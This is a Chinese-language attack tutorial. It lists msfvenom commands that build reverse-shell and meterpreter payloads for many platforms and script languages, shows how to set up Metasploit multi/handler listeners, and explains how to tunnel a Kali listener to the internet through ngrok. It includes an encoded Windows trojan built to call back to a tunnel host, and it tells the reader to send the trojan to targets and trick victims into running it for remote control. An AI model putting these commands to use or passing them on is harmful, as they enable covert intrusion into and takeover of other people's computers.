msfvenom生成payload命令+內網透到外網
進入msfconsole並選擇exploit/multi /handler。為所使用的相關有效負載執行'set payload'並配置所有必需的選項(LHOST,LPORT等)。
執行並等待有效負載執行。對於下面的示例,它是非常自我解釋但LHOST應填入您的IP地址(如果在網路內攻擊,則為LAN IP,如果通過網際網路進行攻擊則為WAN IP),
LPORT應該是您希望重新連線的埠。
msfvenom -l
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Shellcode
對於所有shellcode,請參閱'msfvenom -help-formats'以獲取有效引數的資訊。Msfvenom將輸出能夠以此語言剪下和貼上的程式碼以供您利用。
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Metasploit處理程式可以很好地快速設定Metasploit以便接收您的傳入shell。處理程式應採用以下格式。
use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false exploit -j -z
完成所需的值後,以下命令將執行您的處理程式 'msfconsole -L -r'
內網透到外網+Metasploit控制客戶機
首先我們需要下載一個用於內網穿透的工具來進行埠對映與轉發。這裡我用的是linux64bit
https://www.ngrok.cc/#down-client
,接下來在上面的網站自行註冊申請,然後登陸。然後申請免費隧道,選擇TCP協議,自定義遠端埠,
本地IP地址就是kali的IP地址,埠自定義,但不要衝突。
這裡請記住隧道id,以及自定義遠端埠,kali本機埠
將下載的客戶端放置於指定目錄,cd到目錄,在命令列執行ngrok
./sunny clientid 隧道id
這樣就完成了埠對映,它能將外網埠接收到的資料返回到本機kali的指定埠。
在kali中用msfvenom生成一個payload
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’ lhost=
free.idcfengye.com lport=16577 -f exe > shell.exe
將生成的木馬檔案以各種方式傳送到目標主機,誘使其開啟。
Metasploit控制客戶機
切到Kali,使用Metasploit進行監聽。
設定監聽攻擊模組,監聽載荷,IP(kali本機),埠(ngrok裡自定義的本地埠),然後exp。
use exploit/multi/handler set payloadswindows/meterpreter/reverset_tcp set lhost 10.10.10.129 set lport 12345 exploit
當客戶機執行木馬後,得到一個meterpreter,可以進行的操作。
關於隱藏木馬,加陌生殼,自啟動,檔案包含,程序轉移等各種姿勢加強木馬強度就需要等待更新。。。。。